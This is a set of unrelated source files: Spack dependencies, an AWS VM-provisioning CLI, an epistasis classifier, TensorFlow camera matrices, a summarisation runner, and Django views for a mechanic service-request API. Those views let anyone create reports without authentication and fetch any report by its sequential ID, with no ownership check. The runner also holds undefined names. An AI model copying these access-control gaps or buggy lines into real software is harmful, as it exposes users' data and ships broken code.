depends_on('[email protected]:')
depends_on('fixesproto')
depends_on('xextproto')
depends_on('pkgconfig', type='build')
depends_on('util-macros', type='build')
|
the-stack_106_14864
|
# coding=utf-8
from __future__ import absolute_import, division, print_function
from click import Choice, ClickException, command, option, pass_context
from ..common_options import discrete_ssh_config_option
from ...util.common_options import ansible_output_options
class OperatingSystem(object):
"""
An enumeration of supported operating systems for
Vagrant provisioning of VMs.
"""
fedora = 'fedora'
centos = 'centos'
rhel = 'rhel'
class Provider(object):
"""
An enumeration of supported clouds for provisioning
of VMs.
"""
aws = 'aws'
class Stage(object):
"""
An enumeration of supported stages for images used
for provisioning of VMs.
"""
bare = 'bare'
base = 'base'
build = 'build'
install = 'install'
fork = 'fork'
crio = 'crio'
def destroy_callback(context, _, value):
"""
Tear down the currently running VM
:param context: Click context
:param _: command-line parameter
:param value: whether or not to tear down the VM
"""
if not value or context.resilient_parsing:
return
destroy(context.obj)
context.exit()
_SHORT_HELP = 'Provision a virtual host for an All-In-One deployment.'
@command(
name='all-in-one',
short_help=_SHORT_HELP,
help=_SHORT_HELP + '''
An All-In-One deployment of OpenShift uses one virtual host on which
all cluster components are provisioned. These types of deployments are
most useful for short-term development work-flows.
\b
Examples:
Provision a VM with default parameters (fedora, aws, install)
$ oct provision remote all-in-one
\b
Provision a VM with custom parameters
$ oct provision remote all-in-one --os=centos --provider=aws --stage=base
\b
Tear down the currently running VMs
$ oct provision remote all-in-one --destroy
''',
)
@option(
'--os',
'-o',
'operating_system',
type=Choice([
OperatingSystem.fedora,
OperatingSystem.centos,
OperatingSystem.rhel,
]),
default=OperatingSystem.fedora,
show_default=True,
metavar='NAME',
help='VM operating system.',
)
@option(
'--provider',
'-p',
type=Choice([Provider.aws, ]),
default=Provider.aws,
show_default=True,
metavar='NAME',
help='Cloud provider.',
)
@option(
'--stage',
'-s',
type=Choice([
Stage.bare,
Stage.base,
Stage.build,
Stage.install,
Stage.fork,
Stage.crio,
]),
default=Stage.install,
show_default=True,
metavar='NAME',
help='VM image stage.',
)
@option(
'--name',
'-n',
metavar='NAME',
required=True,
help='VM instance name.',
)
@option(
'--ami-id',
'-a',
'ami_id',
metavar='ID',
help='AWS AMI identifier.',
)
@option(
'--destroy',
'-d',
is_flag=True,
expose_value=False,
help='Tear down the current VMs.',
callback=destroy_callback,
)
@discrete_ssh_config_option
@ansible_output_options
@pass_context
def all_in_one_command(context, operating_system, provider, stage, name, ami_id, discrete_ssh_config):
"""
Provision a virtual host for an All-In-One deployment.
:param context: Click context
:param operating_system: operating system to use for the VM
:param provider: provider to use with Vagrant
:param stage: image stage to base the VM off of
:param name: name to give to the VM instance
:param ami_id: AWS EC2 AMI identifier
:param discrete_ssh_config: whether to update ~/.ssh/config or write a new file
"""
configuration = context.obj
if provider == Provider.aws:
provision_with_aws(configuration, operating_system, stage, name, ami_id, discrete_ssh_config)
else:
if ami_id is not None:
raise ClickException("An AWS EC2 AMI identifier cannot be provided when launching in {}".format(provider))
def destroy(configuration):
"""
Tear down the currently running VMs.
:param configuration: Origin CI Tool configuration
"""
configuration.run_playbook(playbook_relative_path='provision/aws_all_in_one_down', )
def provision_with_aws(configuration, operating_system, stage, name, ami_id, discrete_ssh_config):
"""
Provision a VM in the cloud using AWS EC2.
:param configuration: Origin CI tool configuration
:param operating_system: operating system used for the VM
:param stage: image stage the VM was based off of
:param name: name to give to the VM instance
:param ami_id: AWS EC2 AMI identifier
:param discrete_ssh_config: whether to update ~/.ssh/config or write a new file
"""
if not configuration.aws_client_configuration.keypair_name:
raise ClickException('No key-pair name found! Configure one using:\n $ oct configure aws-client keypair_name NAME')
if not configuration.aws_client_configuration.private_key_path:
raise ClickException(
'No private key path found! Configure one using:\n $ oct configure aws-client private_key_path PATH'
)
playbook_variables = {
'origin_ci_aws_hostname': configuration.next_available_vagrant_name, # TODO: fix this
'origin_ci_aws_ami_os': operating_system,
'origin_ci_aws_ami_stage': stage,
'origin_ci_aws_instance_name': name,
'origin_ci_inventory_dir': configuration.ansible_client_configuration.host_list,
'origin_ci_aws_keypair_name': configuration.aws_client_configuration.keypair_name,
'origin_ci_aws_private_key_path': configuration.aws_client_configuration.private_key_path,
'origin_ci_ssh_config_strategy': 'discrete' if discrete_ssh_config else 'update',
'openshift_schedulable': True,
'openshift_node_labels': {
'region': 'infra',
'zone': 'default',
},
}
if ami_id is not None:
playbook_variables['origin_ci_aws_ami_id'] = ami_id
configuration.run_playbook(
playbook_relative_path='provision/aws-up',
playbook_variables=playbook_variables,
)
if stage == Stage.bare:
# once we have the new host, we must partition the space on it
# that was set aside for Docker storage, then update the kernel
# partition tables and set up the volume group backed by the LVM
# pool
configuration.run_playbook(playbook_relative_path='provision/aws-docker-storage', )
|
the-stack_106_14865
|
__description__ = \
"""
Logistic classifier model.
"""
__author__ = "Zach Sailer"
from epistasis.models.base import BaseModel, use_sklearn
from epistasis.models.utils import arghandler
from .base import EpistasisClassifierMixin
from sklearn.linear_model import LogisticRegression
from sklearn.preprocessing import binarize
import numpy as np
import pandas as pd
@use_sklearn(LogisticRegression)
class EpistasisLogisticRegression(EpistasisClassifierMixin, BaseModel):
"""
Logistic regression for estimating epistatic interactions that lead to
nonviable phenotypes. Useful for predicting viable/nonviable phenotypes.
Parameters
----------
threshold : float
value below which phenotypes are considered nonviable.
order : int
order of epistasis model
model_type : str (default="global")
type of model matrix to use. "global" defines epistasis with respect to
a background-averaged "genotype-phenotype". "local" defines epistasis
with respect to the wildtype genotype.
"""
def __init__(self, threshold=0.2, model_type="global", **kwargs):
super(self.__class__, self).__init__(**kwargs)
self.threshold = threshold
self.model_type = model_type
self.fit_intercept = False
self.order = 1
self.Xbuilt = {}
# Store model specs.
self.model_specs = dict(
threshold=self.threshold,
model_type=self.model_type,
**kwargs)
@arghandler
def fit(self, X=None, y=None, **kwargs):
# Use Additive model to establish the phenotypic scale.
# Prepare Additive model
self._fit_additive(X=X, y=y)
self._fit_classifier(X=X, y=y)
self.epistasis.values = self.coef_[0]
return self
@property
def num_of_params(self):
n = 0
n += self.epistasis.n
return n
@arghandler
def score(self, X=None, y=None, **kwargs):
yclass = binarize(y.reshape(1, -1), threshold=self.threshold)[0]
return super(self.__class__, self).score(X=X, y=yclass)
@arghandler
def lnlike_of_data(self, X=None, y=None, yerr=None, thetas=None):
# Calculate Y's
ymodel = self.hypothesis(X=X, thetas=thetas)
ymodel_ = 1 - ymodel
ymodel[ymodel < 0.5] = ymodel_[ymodel < 0.5]
return np.log(ymodel)
@arghandler
def lnlike_transform(
self,
X=None,
y=None,
yerr=None,
lnprior=None,
thetas=None):
# Update likelihood.
ymodel = self.hypothesis(X=X, thetas=thetas)
yclass = np.ones(len(ymodel))
yclass[ymodel > 0.5] = 0
lnlike = self.lnlike_of_data(X=X, y=y, yerr=yerr, thetas=thetas)
lnprior[yclass == 0] = 0
return lnlike + lnprior
@arghandler
def hypothesis(self, X=None, thetas=None):
# Calculate probability of each class
logit_p0 = 1 / (1 + np.exp(np.dot(X, thetas)))
# Returns probability of class 1
return logit_p0
def hypothesis_transform(self, X=None, y=None, thetas=None):
ypred = self.hypothesis(X=X, thetas=thetas)
y[ypred > 0.5] = self.threshold
return y
@property
def thetas(self):
return self.epistasis.values
|
the-stack_106_14866
|
# Copyright 2020 Traceable, Inc.
#
# Licensed under the Apache License, Version 2.0 (the “License”);
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an “AS IS” BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
contains all the views related to Mechanic
"""
import bcrypt
from django.utils import timezone
from django.views.decorators.csrf import csrf_exempt
from django.urls import reverse
from rest_framework import status
from rest_framework.response import Response
from rest_framework.views import APIView
from django.db import models
from utils.jwt import jwt_auth_required
from utils import messages
from user.models import User, Vehicle, UserDetails
from utils.logging import log_error
from .models import Mechanic, ServiceRequest
from .serializers import MechanicSerializer, ServiceRequestSerializer, ReceiveReportSerializer, SignUpSerializer
class SignUpView(APIView):
"""
Used to add a new mechanic
"""
@csrf_exempt
def post(self, request):
"""
creates a new Mechanic in the db
:param request: http request for the view
method allowed: POST
mandatory fields: ['name', 'email', 'number', 'password', 'mechanic_code']
:returns Response object with
mechanics list and 200 status if no error
message and corresponding status if error
"""
serializer = SignUpSerializer(data=request.data)
if not serializer.is_valid():
log_error(request.path, request.data, status.HTTP_400_BAD_REQUEST, serializer.errors)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
mechanic_details = serializer.data
if User.objects.filter(email=mechanic_details['email']).exists():
return Response({'message': messages.EMAIL_ALREADY_EXISTS}, status=status.HTTP_400_BAD_REQUEST)
if Mechanic.objects.filter(mechanic_code=mechanic_details['mechanic_code']).exists():
return Response({'message': messages.MEC_CODE_ALREADY_EXISTS}, status=status.HTTP_400_BAD_REQUEST)
try:
user_id = User.objects.aggregate(models.Max('id'))['id__max'] + 1
except TypeError:
user_id = 1
user = User.objects.create(
id=user_id,
email=mechanic_details['email'],
number=mechanic_details['number'],
password=bcrypt.hashpw(
mechanic_details['password'].encode('utf-8'),
bcrypt.gensalt()
).decode(),
role=User.ROLE_CHOICES.MECH,
created_on=timezone.now()
)
Mechanic.objects.create(
mechanic_code=mechanic_details['mechanic_code'],
user=user
)
try:
user_details_id = UserDetails.objects.aggregate(models.Max('id'))['id__max'] + 1
except TypeError:
user_details_id = 1
UserDetails.objects.create(
id=user_details_id,
available_credit=0,
name=mechanic_details['name'],
status='ACTIVE',
user=user
)
return Response({'message': messages.MEC_CREATED.format(user.email)}, status=status.HTTP_200_OK)
class MechanicView(APIView):
"""
Mechanic view to fetch all the mechanics
"""
@jwt_auth_required
def get(self, request, user=None):
"""
get_mechanic view for fetching the list of mechanics
:param request: http request for the view
method allowed: GET
http request should be authorised by the jwt token of the user
:param user: User object of the requesting user
:returns Response object with
mechanics list and 200 status if no error
message and corresponding status if error
"""
mechanics = Mechanic.objects.all()
serializer = MechanicSerializer(mechanics, many=True)
response_data = dict(
mechanics=serializer.data
)
return Response(response_data, status=status.HTTP_200_OK)
class ReceiveReportView(APIView):
"""
View to receive report from contact mechanic feature
"""
def get(self, request):
"""
receive_report endpoint for mechanic
:param request: http request for the view
method allowed: POST
mandatory fields: ['mechanic_code', 'problem_details', 'vin']
:returns Response object with
{ service request id, report link } and 200 status if no error
message and corresponding status if error
"""
serializer = ReceiveReportSerializer(data=request.GET)
if not serializer.is_valid():
log_error(request.path, request.data, status.HTTP_400_BAD_REQUEST, serializer.errors)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
report_details = serializer.data
mechanic = Mechanic.objects.get(mechanic_code=report_details['mechanic_code'])
vehicle = Vehicle.objects.get(vin=report_details['vin'])
service_request = ServiceRequest.objects.create(
vehicle=vehicle,
mechanic=mechanic,
problem_details=report_details['problem_details'],
created_on=timezone.now()
)
service_request.save()
report_link = "{}?report_id={}".format(reverse("get-mechanic-report"), service_request.id)
report_link = request.build_absolute_uri(report_link)
return Response({
'id': service_request.id,
'sent': True,
'report_link': report_link
}, status=status.HTTP_200_OK)
class GetReportView(APIView):
"""
View to get only particular service request
"""
def get(self, request):
"""
fetch service request details from report_link
:param request: http request for the view
method allowed: GET
:returns Response object with
service request object and 200 status if no error
message and corresponding status if error
"""
report_id = request.GET['report_id']
if not report_id:
return Response(
{'message': messages.REPORT_ID_MISSING},
status=status.HTTP_400_BAD_REQUEST
)
if not report_id.isnumeric():
return Response(
{'message': messages.INVALID_REPORT_ID, 'vowner': 'owner'},
status=status.HTTP_400_BAD_REQUEST
)
service_request = ServiceRequest.objects.filter(id=report_id).first()
if not service_request:
return Response(
{'message': messages.REPORT_DOES_NOT_EXIST, 'vowner': 'owner'},
status=status.HTTP_400_BAD_REQUEST
)
serializer = ServiceRequestSerializer(service_request)
response_data = dict(serializer.data)
return Response(response_data, status=status.HTTP_200_OK)
class ServiceRequestsView(APIView):
"""
View to return all the service requests
"""
@jwt_auth_required
def get(self, request, user=None):
"""
fetch all service requests assigned to the particular mechanic
:param request: http request for the view
method allowed: GET
http request should be authorised by the jwt token of the mechanic
:param user: User object of the requesting user
:returns Response object with
list of service request object and 200 status if no error
message and corresponding status if error
"""
service_requests = ServiceRequest.objects.filter(mechanic__user=user)
serializer = ServiceRequestSerializer(service_requests, many=True)
response_data = dict(
service_requests=serializer.data
)
return Response(response_data, status=status.HTTP_200_OK)
|
the-stack_106_14867
|
# Copyright 2017 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Collection of TF functions for managing 3D camera matrices."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
import tensorflow as tf
def perspective(aspect_ratio, fov_y, near_clip, far_clip):
"""Computes perspective transformation matrices.
Functionality mimes gluPerspective (third_party/GL/glu/include/GLU/glu.h).
Args:
aspect_ratio: float value specifying the image aspect ratio (width/height).
fov_y: 1-D float32 Tensor with shape [batch_size] specifying output vertical
field of views in degrees.
near_clip: 1-D float32 Tensor with shape [batch_size] specifying near
clipping plane distance.
far_clip: 1-D float32 Tensor with shape [batch_size] specifying far clipping
plane distance.
Returns:
A [batch_size, 4, 4] float tensor that maps from right-handed points in eye
space to left-handed points in clip space.
"""
# The multiplication of fov_y by pi/360.0 simultaneously converts to radians
# and adds the half-angle factor of .5.
focal_lengths_y = 1.0 / tf.tan(fov_y * (math.pi / 360.0))
depth_range = far_clip - near_clip
p_22 = -(far_clip + near_clip) / depth_range
p_23 = -2.0 * (far_clip * near_clip / depth_range)
zeros = tf.zeros_like(p_23, dtype=tf.float32)
# pyformat: disable
perspective_transform = tf.concat(
[
focal_lengths_y / aspect_ratio, zeros, zeros, zeros,
zeros, focal_lengths_y, zeros, zeros,
zeros, zeros, p_22, p_23,
zeros, zeros, -tf.ones_like(p_23, dtype=tf.float32), zeros
], axis=0)
# pyformat: enable
perspective_transform = tf.reshape(perspective_transform, [4, 4, -1])
return tf.transpose(perspective_transform, [2, 0, 1])
def look_at(eye, center, world_up):
"""Computes camera viewing matrices.
Functionality mimes gluLookAt (third_party/GL/glu/include/GLU/glu.h).
Args:
eye: 2-D float32 tensor with shape [batch_size, 3] containing the XYZ world
space position of the camera.
center: 2-D float32 tensor with shape [batch_size, 3] containing a position
along the center of the camera's gaze.
world_up: 2-D float32 tensor with shape [batch_size, 3] specifying the
world's up direction; the output camera will have no tilt with respect
to this direction.
Returns:
A [batch_size, 4, 4] float tensor containing a right-handed camera
extrinsics matrix that maps points from world space to points in eye space.
"""
batch_size = center.shape[0].value
vector_degeneracy_cutoff = 1e-6
forward = center - eye
forward_norm = tf.norm(forward, ord='euclidean', axis=1, keep_dims=True)
tf.assert_greater(
forward_norm,
vector_degeneracy_cutoff,
message='Camera matrix is degenerate because eye and center are close.')
forward = tf.divide(forward, forward_norm)
to_side = tf.cross(forward, world_up)
to_side_norm = tf.norm(to_side, ord='euclidean', axis=1, keep_dims=True)
tf.assert_greater(
to_side_norm,
vector_degeneracy_cutoff,
message='Camera matrix is degenerate because up and gaze are close or'
'because up is degenerate.')
to_side = tf.divide(to_side, to_side_norm)
cam_up = tf.cross(to_side, forward)
w_column = tf.constant(
batch_size * [[0., 0., 0., 1.]], dtype=tf.float32) # [batch_size, 4]
w_column = tf.reshape(w_column, [batch_size, 4, 1])
view_rotation = tf.stack(
[to_side, cam_up, -forward,
tf.zeros_like(to_side, dtype=tf.float32)],
axis=1) # [batch_size, 4, 3] matrix
view_rotation = tf.concat(
[view_rotation, w_column], axis=2) # [batch_size, 4, 4]
identity_batch = tf.tile(tf.expand_dims(tf.eye(3), 0), [batch_size, 1, 1])
view_translation = tf.concat([identity_batch, tf.expand_dims(-eye, 2)], 2)
view_translation = tf.concat(
[view_translation,
tf.reshape(w_column, [batch_size, 1, 4])], 1)
camera_matrices = tf.matmul(view_rotation, view_translation)
return camera_matrices
def euler_matrices(angles):
"""Computes a XYZ Tait-Bryan (improper Euler angle) rotation.
Returns 4x4 matrices for convenient multiplication with other transformations.
Args:
angles: a [batch_size, 3] tensor containing X, Y, and Z angles in radians.
Returns:
a [batch_size, 4, 4] tensor of matrices.
"""
s = tf.sin(angles)
c = tf.cos(angles)
# Rename variables for readability in the matrix definition below.
c0, c1, c2 = (c[:, 0], c[:, 1], c[:, 2])
s0, s1, s2 = (s[:, 0], s[:, 1], s[:, 2])
zeros = tf.zeros_like(s[:, 0])
ones = tf.ones_like(s[:, 0])
# pyformat: disable
flattened = tf.concat(
[
c2 * c1, c2 * s1 * s0 - c0 * s2, s2 * s0 + c2 * c0 * s1, zeros,
c1 * s2, c2 * c0 + s2 * s1 * s0, c0 * s2 * s1 - c2 * s0, zeros,
-s1, c1 * s0, c1 * c0, zeros,
zeros, zeros, zeros, ones
],
axis=0)
# pyformat: enable
reshaped = tf.reshape(flattened, [4, 4, -1])
return tf.transpose(reshaped, [2, 0, 1])
|
the-stack_106_14870
|
from __future__ import print_function, unicode_literals
import hashlib
import json
import logging
import os
import re
from os import path
import dill as pickle
import dill as pickle
import pandas as pd
from algorithms.flight_recorder import FlightRecorder, Record
from algorithms.oracle.human_oracle import HumanOracle
from algorithms.simulated_feedback import SimulatedFeedback
from algorithms.upper_bound_ilp import ExtractiveUpperbound
from baselines.sume_wrap import SumeWrap
from model.topic import Topic
from rouge.rouge import Rouge
from utils.data_helpers import load_w2v_embeddings
from utils.writer import write_to_file, write_details_file
from utils.load_clusters import get_clusters
import random
from performance_utils.mlogger import MeasurementLogger
from performance_utils.timer import IterationTimer, RunTimer
from performance_utils.mreader import MeasurementReader
import threading
def roundup(x):
return int(math.ceil(x / 100.0)) * 100
def get_k_limit(data_set, topic):
# dumsum = sume.ConceptBasedILPSummarizer(" ", language, True)
# dumsum.sentences = SumeWrap(language).load_sume_sentences(docs, parser_type, parse_info)
# dumsum.prune_sentences(remove_citations=True, remove_redundancy=True, imp_list=[])
# topic_sentence_size = len(dumsum.sentences)
from log_folder import log_folder
mreader = MeasurementReader()
mreader.info['dataset'] = data_set
mreader.read_corpora_stats(log_folder)
mreader.set_topic_rid(topic)
topic_sentence_size = mreader.get_corpus_stat("Corpus Size after")
return topic_sentence_size
def get_flightrecorder_from_file(weights_file=None):
"""
Parses a json containing the feedbacks. And verifies its layout.
:param weights_file:
:return: dict of str -> double
"""
flightrecorder = FlightRecorder()
if weights_file is None:
return flightrecorder
elif weights_file.endswith(".json"):
df = pd.read_json(path.normpath(weights_file))
elif weights_file.endswith(".csv"):
df = pd.read_csv(path.normpath(weights_file))
record = Record()
last_iteration = 0
for row in df.iterrows():
if row[1].iteration > last_iteration:
flightrecorder.add_record(record)
record = Record()
last_iteration = row[1].iteration
if row[1].value.lower() == "accept":
record.accept.union_update([row[1].concept])
elif row[1].value.lower() == "reject":
record.reject.union_update([row[1].concept])
elif row[1].value.lower() == "implicit_reject":
record.implicit_reject.union_update([row[1].concept])
flightrecorder.add_record(record)
return flightrecorder
def load_ub_summary(language, docs, models, size, ngram_type=2,
base_dir=path.normpath(path.expanduser("~/.ukpsummarizer/cache/"))):
import hashlib
m = hashlib.sha256()
shortened_docs = [path.split(f)[1] for (f, _) in docs]
for doc in sorted(shortened_docs):
m.update(doc)
shortened_models = [path.split(f)[1] for (f, _) in models]
for model in sorted(shortened_models):
m.update(model)
m.update(str(size))
m.update(language)
m.update(str(ngram_type))
h = m.hexdigest()
jsonloc = path.normpath(path.join(base_dir, h + ".json"))
if path.isfile(jsonloc):
try:
ubs = json.load(open(jsonloc))
upsum = ubs["summary"]
return upsum
except:
pass
upsum = ExtractiveUpperbound(language)
ub_summary = upsum(docs, models, size, ngram_type)
jdict = {"docs": sorted(shortened_docs), "summary": ub_summary, "models": sorted(shortened_models), "size": size,
"language": language, "ngram_type": ngram_type}
j = json.dumps(jdict)
write_to_file(j, jsonloc)
return ub_summary
def convert_to_json(sentences):
"""
:param sentences: list(baselines.sume.base.Sentence)
:return:
"""
log = logging.getLogger()
for s in sentences:
t = {
"untokenized_form": s.untokenized_form,
"concepts": s.concepts,
"untokenized_concepts": s.untokenized_concepts,
"doc_id": s.doc_id,
"sent_id": s.position,
"length": s.length,
"tokens": s.tokens,
"phrases": s.phrases,
"untokenized_phrases": s.raw_phrases
}
yield t
class SingleTopicRunner(object):
tlog = logging.getLogger("timings")
def __init__(self, iobasedir, rouge_dir, out=None, scores_dir=None, override_results_files=False,
pickle_store=None, k=0.1):
self.iobasedir = path.normpath(path.expanduser(iobasedir))
# resolved_rouge_dir = path.normpath(path.expanduser(rouge_dir))
self.rouge = Rouge(rouge_dir)
self.k = k
if out is None:
self.out = None
else:
self.out = path.normpath(path.expanduser(out))
if scores_dir is None:
self.scores_storage_path = path.normpath(path.join(self.iobasedir, "scores_new"))
else:
self.scores_storage_path = path.normpath(path.join(self.iobasedir, scores_dir))
if not path.exists(self.scores_storage_path):
os.mkdir(self.scores_storage_path)
self.override_results_switch = override_results_files
if pickle_store is None:
self.pickle_store = pickle_store
else:
p, f = path.split(path.join(self.iobasedir, pickle_store))
if path.exists(p):
self.pickle_store = path.join(self.iobasedir, pickle_store)
else:
p, f = path.split(pickle_store)
if (path.exists(p)):
self.pickle_store = pickle_store
else:
raise BaseException(
"Cannot resolve %s to a existing path for storing the serialized summarizer" % (pickle_store))
def single_iteration(self, picklein, pickleout=None, feedbacks=None):
log = logging.getLogger("SingleTopicRunner")
log.info("unpickling input %s" % (picklein))
sf = pickle.load(open(picklein, 'rb'))
log.info("done unpick input")
iteration = len(sf.flight_recorder.records) + 1
labeled_data = feedbacks or []
svm_flag = 0
sf.oracle = HumanOracle(labeled_data)
if 'k_size' in labeled_data:
self.k = labelled_data['k_size']
if sf.k != self.k:
log.info("recording k_size in continue %f", sf.k)
log.info("recording sentence size in continue %d", len(sf.summarizer.sentences))
sf.k = self.k
if sf.run_config['rank_subset']:
sf.summarizer.sentences = sf.summarizer.all_sentences
sf.summarizer.weights = sf.sentence_ranker.all_concept_weights
sf.initialize_sentence_ranking()
log.info("recording k_size in continue %f", sf.k)
log.info("recording sentence size in continue %d", len(sf.summarizer.sentences))
log.info("records before: %s", len(sf.flight_recorder.records))
log.info("running iteration")
samples = [i["concept"] for i in labeled_data]
score, summary, summary_sentences, unlabeled_data, exploratory_sentences = sf.single_iteration(iteration,
samples,
svm_flag)
sf.__print_iteration_info__(summary_sentences, iteration, summary, score,
unlabeled_data, exploratory_sentences)
log.info("records after run: %s", len(sf.flight_recorder.records))
self.write_continue_output_result(sf,
unlabeled_data,
picklein,
pickleout,
summary,
summary_sentences,
exploratory_sentences)
if pickleout is not None:
self.pickle_write(sf, pickleout, log)
def pickle_write(self, sf, pickleout, log):
output = open(pickleout, 'wb')
pickle.dump(sf, output)
output.close()
log.info("### wrote pickle output to %s" % (pickleout))
def run(self, topic_path, size=None, summarizer="SUME", summary_idx=None, parser=None,
oracle="accept", feedback_log=None, propagation=False, max_iteration_count=10, preload_embeddings=None,
feedbackstore=None, override_results_files=False, num_clusters=8):
log = logging.getLogger("SingleTopicRunner")
sf = None # just for the sake of being able to run without simulated feedback...
self.tlog.debug("SingleTopicRunner started")
# relativize the topic path!
if type(topic_path) is Topic:
topic = topic_path
else:
if topic_path.startswith("/"):
relative_path = re.search('^(/)(.*)$', topic_path).group(2)
else:
relative_path = topic_path
topic = Topic(path.join(self.iobasedir, path.normpath(relative_path)))
language = topic.get_language()
docs = topic.get_docs()
summaries = topic.get_models()
flightrecorder = get_flightrecorder_from_file(feedback_log)
preceding_size = len(
flightrecorder.records) # the number of iterations that happened due to the provided feedback_log
embeddings = None
"""
if preload_embeddings:
embeddings_path = path.normpath(path.join(self.iobasedir, "embeddings"))
embeddings = load_w2v_embeddings(embeddings_path, language, 'active_learning')
else:
embeddings = preload_embeddings
"""
if summary_idx is not None:
summaries = [summaries[summary_idx]]
if size is None:
use_size = topic.get_summary_size()
else:
use_size = size
clusters_path = path.join(self.iobasedir, 'clustering', '{}'.format(num_clusters))
#print(clusters_path)
#clusters = get_clusters(clusters_path, topic.docs_dir)
if summarizer == "SUME":
sw = SumeWrap(language)
summary = sw(docs, use_size)
outputfilecontents = {"summary": summary, "type": summarizer, "info_data": []}
json_content = json.dumps(outputfilecontents)
if self.out is not None:
log.info("writing output to %s" % (self.out))
write_to_file(json_content, self.out)
write_to_file(json_content,
path.normpath(path.expanduser(path.join(self.iobasedir, "tmp", "tmp.json"))))
elif summarizer == "UPPER_BOUND":
ub_summary = load_ub_summary(language, docs, summaries, use_size, base_dir=self.iobasedir)
summary = '\n'.join(ub_summary)
outputfilecontents = {"summary": summary, "type": summarizer, "info_data": []}
json_content = json.dumps(outputfilecontents)
if self.out is not None:
log.info("writing output to %s" % (self.out))
write_to_file(json_content, self.out)
write_to_file(json_content, path.normpath(path.expanduser(path.join(self.iobasedir, "tmp", "tmp.json"))))
elif summarizer == "PROPAGATION":
#UB considering all the summaries
ub_summary = load_ub_summary(language, docs, summaries, use_size, base_dir=self.iobasedir)
summary = '\n'.join(ub_summary)
ub_scores = self.rouge(summary, summaries, use_size)
log.debug("UB scores: R1:%s R2:%s SU4:%s" % (str(ub_scores[0]), str(ub_scores[1]), str(ub_scores[2])))
ref_summ = random.choice(summaries)
parse_info = []
#parse_info = topic.get_parse_info(summaries.index(ref_summ))
# initialize the Algorithm.
run_config = dict()
run_config['rank_subset'] = True
run_config['relative_k'] = True
run_config['dynamic_k'] = False
for flag in ['adaptive_sampling', 'strategy']:
run_config[flag] = False
r = 0
clusters = None
log.info("recording k_size in summarize %f", self.k)
#TODO: Added summaries instead of one single summary
sf = SimulatedFeedback(language, self.rouge, embeddings=None, #TODO: embeddings
docs=docs, models=summaries,
summary_length=use_size,
oracle_type=oracle,
ub_score=ub_scores, ub_summary=ub_summary,
parser_type=parser, flightrecorder=flightrecorder,
feedbackstore=feedbackstore, parse_info=parse_info,
run_config=run_config, k=self.k, adaptive_window_size=r, clusters=clusters)
if sf.embeddings is None or sf.embeddings == {}:
embe_var = "none",
else:
if sf.embeddings.embedding_variant is None:
embe_var = "none"
else:
embe_var = sf.embeddings.embedding_variant
if feedbackstore is None:
cfg = {"type": "Unconfigured default"}
else:
cfg = feedbackstore.get_config()
rs = []
for p, t in [ref_summ]:
rs.append({
"name": os.path.split(p)[1],
"text": t})
run_id_string = "%s-%s-%s-%s-%s-%s-%s-%s" % (
oracle, summarizer, parser, embe_var, topic.get_dataset(), topic.get_name(),
[item["name"] for item in rs], json.dumps(cfg))
run_id = hashlib.sha224(run_id_string).hexdigest()
filename = path.join(self.scores_storage_path, "result-%s.json" % (run_id))
if (os.path.exists(filename)
and self.out is None
and self.override_results_switch is False):
log.info("Skipping run_id '%s' because the result file does already exist. config: %s" % (
run_id, run_id_string))
return
else:
log.info("Doing %s iterations for run_id '%s'\n %s" % (max_iteration_count, run_id, run_id_string))
write_to_file("", filename)
summary, confirmatory_summary, exploratory_summary = sf.run_full_simulation(
max_iteration_count=max_iteration_count)
recommendations, recom_sentences = sf.get_recommendations()
derived_records = []
# construct table-like array of feedbacks per iteration.
for i, record in enumerate(sf.flight_recorder.records):
for accept in record.accept:
derived_records.append({
"iteration": i,
"concept": accept,
"value": "accept"
})
for reject in record.reject:
derived_records.append({
"iteration": i,
"concept": reject,
"value": "reject"
})
for implicit_reject in record.implicit_reject:
derived_records.append({
"iteration": i,
"concept": implicit_reject,
"value": "implicit_reject"
})
for item in recommendations:
derived_records.append({
"iteration": -1,
"concept": item,
"value": "recommendation",
"weight": sf.summarizer.weights.get(item, 0.0),
"uncertainity": sf.svm_uncertainity.get(item, -1.0)
})
result = {
"config_run_id": run_id,
"config_oracle_type": oracle,
"config_summarizer_type": summarizer,
"config_parse_type": str(parser),
#"config_wordembeddings": emb_var,
"config_feedbackstore": sf.feedbackstore.get_config(),
"config_feedback_interpretation": {},
"config_concept_recommendation": {},
"dataset": topic.get_dataset(),
"topic": topic.get_name(),
"models": rs,
"model_rougescores": {
"iteration": -1,
"ROUGE-1 R score": ub_scores[0],
"ROUGE-2 R score": ub_scores[1],
"ROUGE-SU* R score": ub_scores[2],
"accepted": [],
"accept_count": 0,
"rejected": [],
"reject_count": 0,
"summary": ub_summary
},
"result_summary": summary,
"result_rougescores": sf.log_sir_info_data,
"log_feedbacks": derived_records
}
r2 = [{"iteration": i, "summary": sf.log_info_data[i]} for i in
range(len(sf.flight_recorder.records))]
log.debug(
"records: %s, infos %s, diff: %s" % (len(sf.flight_recorder.records), len(sf.log_info_data),
len(sf.flight_recorder.records) - len(sf.log_info_data)))
write_to_file(json.dumps(result), filename)
log.info("Writing results to %s" % (filename))
df = pd.DataFrame(derived_records)
filename = path.join(self.scores_storage_path, "flightrecorder-%s.csv" % (run_id))
log.info("saving flightrecorder to %s with run_id %s" % (filename, run_id))
df.to_csv(filename, encoding="UTF-8")
write_to_file(json.dumps(sf.new_debug_weights_history),
path.join(self.scores_storage_path, "weightshistory-%s-%s-%s-%s.json" % (
topic.get_dataset(), topic.get_name(), summarizer, run_id)))
log.info("Writing weights history to %s" % (filename))
weights_hist = pd.DataFrame(sf.new_debug_weights_history)
filename = path.join(self.scores_storage_path, "weightshistory-%s.csv" % (run_id))
weights_hist.to_csv(filename, encoding="UTF-8")
log.debug("----------------------------------------------")
log.debug(summary)
